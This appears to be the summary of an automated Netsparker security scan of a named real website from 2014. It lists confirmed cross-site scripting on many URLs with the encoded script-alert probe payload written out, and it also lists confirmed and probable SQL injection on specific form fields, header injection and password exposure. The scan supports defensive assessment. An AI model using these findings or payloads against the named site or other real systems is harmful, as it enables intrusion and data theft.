Você está na página 1de 146

NETSPARKER SCAN REPORT SUMMARY

TARGET URL
http://www.shalomlaam.co.il/
SCAN DATE
20 15:41:03 2014
REPORT DATE
20 16:55:44 2014
SCAN DURATION
01:12:58
Total
Requests
59131
Average
Speed
13.51 req/sec.
268
identified
158
confirmed
10
critical
95
informational
SCAN SETTINGS
ENABLED
ENGINES
Static Tests, Find Backup Files, SQL Injection,
Boolean SQL Injection, Blind SQL Injection, Cross-site
Scripting, Command Injection, Blind Command Injection,
Local File Inclusion, Remote File Inclusion, Remote
Code Evaluation, HTTP Header Injection, Open
Redirection, Expression Language Injection
Authentication
Scheduled
VULNERABILITIES
CRITICAL
4%
IMPORTANT
57%
MEDIUM
3%
LOW
1%
INFORMATION
35%
1 / 146
VULNERABILITY SUMMARY
URL Parameter Method Vulnerability Confirmed
/ [Possible] Internal
Path Leakage (*nix)
No
/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000DB)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/2minute/ [Possible] Internal
Path Leakage (*nix)
No
/about'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004F1)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/about/ [Possible] Internal
Path Leakage (*nix)
No
/about/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00013C)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/about/Default.asp [Possible] Internal
Path Leakage (*nix)
No
/about/reg/ Query
Based
Query
String
Cross-site Scripting Yes
/about/reg/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004FA)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/about/reg/maillingUpdate.asp Query
Based
Query
String
Cross-site Scripting Yes
/about/reg/maillingUpdate.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000522)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/about/search/ Query
Based
Query
String
Cross-site Scripting Yes
/about/search/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00052F)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/about/search/default.asp Query
Based
Query
String
Cross-site Scripting Yes
/about/search/default.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00055A)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/allvideo/ [Possible] Internal
Path Leakage (*nix)
No
/allvideo/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001D1)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/alon/ [Possible] Internal
Path Leakage (*nix)
No
/alon/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000150)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/alon/archive.asp [Possible] Internal
Path Leakage (*nix)
No
/alon/Default.asp [Possible] Internal
Path Leakage (*nix)
No
/alon/Default.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00043A)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/alon/list.asp [Possible] Internal
Path Leakage (*nix)
No
[Possible] Internal
Path Leakage
(Windows)
No
/alon/list.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000156)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/alon/mador.asp [Possible] Internal
Path Leakage (*nix)
No
[Possible] Internal
Path Leakage
(Windows)
No
/alon/musag.asp [Possible] Internal
Path Leakage (*nix)
No
/alon/musag.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000198)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
2 / 146
/ask'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00017C)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/ask/ rabbi GET Cross-site Scripting Yes
cat GET Cross-site Scripting Yes
search POST Cross-site Scripting Yes
[Possible] Internal
Path Leakage (*nix)
No
[Possible] Internal
Path Leakage
(Windows)
No
/ask/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000149)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/ask/answer.asp Programming Error
Message
No
[Possible] Internal
Path Leakage (*nix)
No
[Possible] Internal
Path Leakage
(Windows)
No
/ask/answer.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000195)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/ask/ask_rabbi.asp [Possible] Internal
Path Leakage (*nix)
No
/ask/ask_rabbi.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000584)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/ask/Default.asp [Possible] Internal
Path Leakage (*nix)
No
[Possible] Internal
Path Leakage
(Windows)
No
/ask/reg/ Query
Based
Query
String
Cross-site Scripting Yes
/ask/reg/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00062A)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/ask/reg/maillingUpdate.asp Query
Based
Query
String
Cross-site Scripting Yes
/ask/reg/maillingUpdate.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000642)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/ask/search/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000646)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/banner/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00057B)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/bmidrash/ [Possible] Internal
Path Leakage (*nix)
No
/bmidrash/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001C7)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/bmidrash/answer.asp [Possible] Internal
Path Leakage (*nix)
No
/bmidrash/bprint.asp [Possible] Internal
Path Leakage (*nix)
No
/bmidrash/Default.asp [Possible] Internal
Path Leakage (*nix)
No
/bmidrash/list.asp [Possible] Internal
Path Leakage (*nix)
No
/bmidrash/mekorot.asp [Possible] Internal
Path Leakage (*nix)
No
/Branches/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00015B)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/Branches/snif.asp [Possible] Internal
Path Leakage (*nix)
No
/Branches/snif.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000204)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
3 / 146
/contact/ name_id POST SQL Injection Yes
sendFrom POST [Probable] SQL
Injection
No
name POST [Probable] SQL
Injection
No
phone POST [Probable] SQL
Injection
No
subject POST [Probable] SQL
Injection
No
f_name POST [Probable] SQL
Injection
No
name_id POST [Probable] SQL
Injection
No
MS SQL Version Is
Out Of Date
No
Microsoft SQL Server
Identified
Yes
E-mail Address
Disclosure
No
[Possible] Internal
Path Leakage (*nix)
No
/contact/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000138)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/contact/Default.asp [Possible] Internal
Path Leakage (*nix)
No
/contact/reg/ Query
Based
Query
String
Cross-site Scripting Yes
/contact/reg/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00046E)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/contact/reg/maillingUpdate.asp Query
Based
Query
String
Cross-site Scripting Yes
/contact/reg/maillingUpdate.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000498)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/contact/search/ Query
Based
Query
String
Cross-site Scripting Yes
/contact/search/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004A9)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/contact/search/default.asp Query
Based
Query
String
Cross-site Scripting Yes
/contact/search/default.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004D2)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/crossdomain.xml Open Policy
Crossdomain.xml
Identified
Yes
/Default.asp [Possible] Internal
Path Leakage (*nix)
No
/default.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000216)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/etz_haim/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001B2)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/gallery/ [Possible] Internal
Path Leakage (*nix)
No
[Possible] Internal
Path Leakage
(Windows)
No
/gallery/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00014F)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/gallery/branches.asp [Possible] Internal
Path Leakage (*nix)
No
[Possible] Internal
Path Leakage
(Windows)
No
4 / 146
/gallery/Default.asp [Possible] Internal
Path Leakage (*nix)
No
[Possible] Internal
Path Leakage
(Windows)
No
/gallery/Default.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00026D)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/gallery/snifim.asp [Possible] Internal
Path Leakage (*nix)
No
/gallery/upload_img.asp File Upload
Functionality
Identified
Yes
[Possible] Internal
Path Leakage (*nix)
No
/gvideo/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000115)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/gvideo/index.html'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000134)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/gvideo/js/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000439)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/gvideo/js/swfaddress.js'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000445)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/gvideo/js/swfobject.js'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00043D)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/gvideo/style/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00044E)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/gvideo/style/style.css'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000452)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/gvideo/testimonialrotator/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000446)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/gvideo/testimonialrotator/testimonialrotator.css'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000455)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/gvideo/testimonialrotator/testimonialrotator.js'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000449)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/hagim/ [Possible] Internal
Path Leakage (*nix)
No
/hagim/3shavuot.asp [Possible] Internal
Path Leakage (*nix)
No
/home/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00010D)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/home/1.css'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000119)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/home/home_page.css'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00011E)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/images/ Internal Server Error Yes
/images/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000105)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/images/Default.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003E9)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/images/pagetop.asp Query
Based
Query
String
Cross-site Scripting Yes
/images/pagetop.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003E6)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/jAccordion/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000F2)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/jAccordion/default.css'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000127)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/jAccordion/jquery.easing.1.3.min.js'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000F5)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/jAccordion/jquery.jAccordion-1.2.1.min.js'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000F9)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/js/ Forbidden Resource Yes
/js/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000D7)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
5 / 146
/js/+%20win%20+ Query
Based
Query
String
Cross-site Scripting Yes
/js/+%20win%20+'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000409)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/js/AC_RunActiveContent.js'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000DF)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/js/delate_image.asp Query
Based
Query
String
Cross-site Scripting Yes
/js/delate_image.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003CE)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/js/func_site.js'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000DC)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/js/getbanner.asp Query
Based
Query
String
Cross-site Scripting Yes
/js/getbanner.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003E5)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/js/HebDate.js'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000E5)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/js/images/ Query
Based
Query
String
Cross-site Scripting Yes
/js/images/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00040C)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/js/top1.htm Query
Based
Query
String
Cross-site Scripting Yes
/js/top1.htm'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003C2)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/js/upload_image.asp Query
Based
Query
String
Cross-site Scripting Yes
/js/upload_image.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003AF)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/kaftorim/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00057E)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/komiks/ [Possible] Internal
Path Leakage (*nix)
No
/komiks/Default.asp [Possible] Internal
Path Leakage (*nix)
No
/l/ [Possible] Internal
Path Leakage (*nix)
No
/l/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001A7)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/l/agrala_miadim.asp [Possible] Internal
Path Leakage (*nix)
No
/l/agrala_sheelot.asp [Possible] Internal
Path Leakage (*nix)
No
/l/agrala_takanon.asp [Possible] Internal
Path Leakage (*nix)
No
/l/agrala_tozaot.asp [Possible] Internal
Path Leakage (*nix)
No
/l/Default.asp [Possible] Internal
Path Leakage (*nix)
No
/lessons/ yom POST [Probable] SQL
Injection
No
[Possible] Internal
Path Leakage (*nix)
No
/lessons/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001A8)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/lessons/default.asp yom POST [Probable] SQL
Injection
No
[Possible] Internal
Path Leakage (*nix)
No
/LIVE/ [Possible] Internal
Path Leakage (*nix)
No
/LIVE/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00019D)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
6 / 146
/live/form_live.asp [Possible] Internal
Path Leakage (*nix)
No
/maillingUpdate.asp Query
Based
Query
String
Cross-site Scripting Yes
/maillingUpdate.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000210)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/news'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001B7)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/news/ [Possible] Internal
Path Leakage (*nix)
No
/news/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000400)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/news/Default.asp [Possible] Internal
Path Leakage (*nix)
No
/page/ [Possible] Internal
Path Leakage (*nix)
No
/page/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004E9)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/page/odot/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004E2)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/pages/ [Possible] Internal
Path Leakage (*nix)
No
/pages/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001F1)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/pages/Default.asp [Possible] Internal
Path Leakage (*nix)
No
/pages/page.asp [Possible] Internal
Path Leakage (*nix)
No
/pages/page.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00021B)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/pagetop.asp [Possible] Internal
Path Leakage (*nix)
No
/pic/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00011F)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/pitgam'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00013F)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/pitgam/ [Possible] Internal
Path Leakage (*nix)
No
[Possible] Internal
Path Leakage
(Windows)
No
/pitgam/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00045B)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/pitgam/Default.asp [Possible] Internal
Path Leakage (*nix)
No
[Possible] Internal
Path Leakage
(Windows)
No
/Presentation/ [Possible] Internal
Path Leakage (*nix)
No
/Presentation/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000145)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/Presentation/Default.asp [Possible] Internal
Path Leakage (*nix)
No
/reg/ email POST [Probable] SQL
Injection
No
[Possible] Internal
Path Leakage (*nix)
No
/reg/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001B9)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/reg/Default.asp [Possible] Internal
Path Leakage (*nix)
No
7 / 146
/reg/login.asp Password
Transmitted Over
HTTP
Yes
Auto Complete
Enabled
Yes
[Possible] Internal
Path Leakage (*nix)
No
/reg/maillingUpdate.asp Database Error
Message
No
[Possible] Internal
Path Leakage (*nix)
No
/reg/maillingUpdate.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001D5)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/reg/reg.asp [Possible] Internal
Path Leakage (*nix)
No
/scripts/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000FD)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/scripts/swfobject.js'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000FF)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/search/ [Possible] Internal
Path Leakage (*nix)
No
/search/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001D7)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/search/default.asp q GET Cross-site Scripting Yes
[Possible] Internal
Path Leakage (*nix)
No
/search/default.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001DA)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/sh/ [Possible] Internal
Path Leakage (*nix)
No
/sh/default.asp [Possible] Internal
Path Leakage (*nix)
No
/sipur/ [Possible] Internal
Path Leakage (*nix)
No
[Possible] Internal
Path Leakage
(Windows)
No
/sipur/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001A0)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/sipur/Default.asp [Possible] Internal
Path Leakage (*nix)
No
/sipur/page.asp [Possible] Internal
Path Leakage (*nix)
No
[Possible] Internal
Path Leakage
(Windows)
No
/sipur/send_sipur.asp [Possible] Internal
Path Leakage (*nix)
No
/site/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000106)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/site/about/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00028E)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/site/alon/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00012E)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/site/alon/archive.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00029F)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/site/alon/list.asp CatID GET HTTP Header
Injection
No
/site/alon/list.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000131)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/site/ask/ CatID GET HTTP Header
Injection
No
/site/ask/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000298)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
8 / 146
/site/ask/answer.asp id GET HTTP Header
Injection
No
/site/ask/answer.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000302)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/site/ask/answer_print.asp [Possible] Internal
Path Leakage
(Windows)
No
/site/ask/ask_rabbi.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002D2)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/site/bmidrash/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002AD)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/site/bmidrash/answer.asp id GET HTTP Header
Injection
No
/site/bmidrash/answer.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00037E)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/site/bmidrash/list.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00033E)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/site/bmidrash/mekorot.asp id GET HTTP Header
Injection
No
/site/bmidrash/mekorot.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000386)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/site/Branches/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002A1)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/site/contact/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00028A)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/site/etz_haim/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002AE)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/site/gallery/ IIS Version
Disclosure
No
/site/gallery/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000F7)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/site/gallery/highslide/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000E8)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/site/gallery/highslide/highslide.css'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000123)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/site/gallery/highslide/highslide-full.js'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001C4)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/site/l/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002A2)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/site/l/agrala_miadim.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00038E)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/site/l/agrala_sheelot.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000397)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/site/l/agrala_takanon.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000393)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/site/l/agrala_tozaot.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002A5)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/site/pic/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00045E)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/site/pitgam/ CatID GET HTTP Header
Injection
No
/site/pitgam/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000293)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/site/Presentation/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002DC)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/site/reg/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00027E)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/site/reg/login.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000283)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/site/reg/reg.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000288)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/site/uploadimages/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002B4)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
9 / 146
/site/yeshiva/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002B1)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/sitemap.xml Sitemap Identified No
/snif.asp Query
Based
Query
String
Cross-site Scripting Yes
/snif.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000234)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/tags/ q GET Cross-site Scripting Yes
[Possible] Internal
Path Leakage (*nix)
No
/tags/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001BB)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/tags/tags.asp [Possible] Internal
Path Leakage (*nix)
No
[Possible] Internal
Path Leakage
(Windows)
No
/tags/tags.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001CB)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/UploadImages/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000109)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/uploadimages/2011_8_22_13_2_45.JPG'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000573)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/video/ [Possible] Internal
Path Leakage (*nix)
No
/video/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001CE)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/video/Default.asp [Possible] Internal
Path Leakage (*nix)
No
/vod/ [Possible] Internal
Path Leakage (*nix)
No
/vod/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00016B)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/vod/vod.asp id GET Cross-site Scripting Yes
[Possible] Internal
Path Leakage (*nix)
No
[Possible] Internal
Path Leakage
(Windows)
No
/vod/vod.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000160)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/yeshiva/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001AF)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
10 / 146
1 TOTAL
CRITICAL
CONFIRMED
1
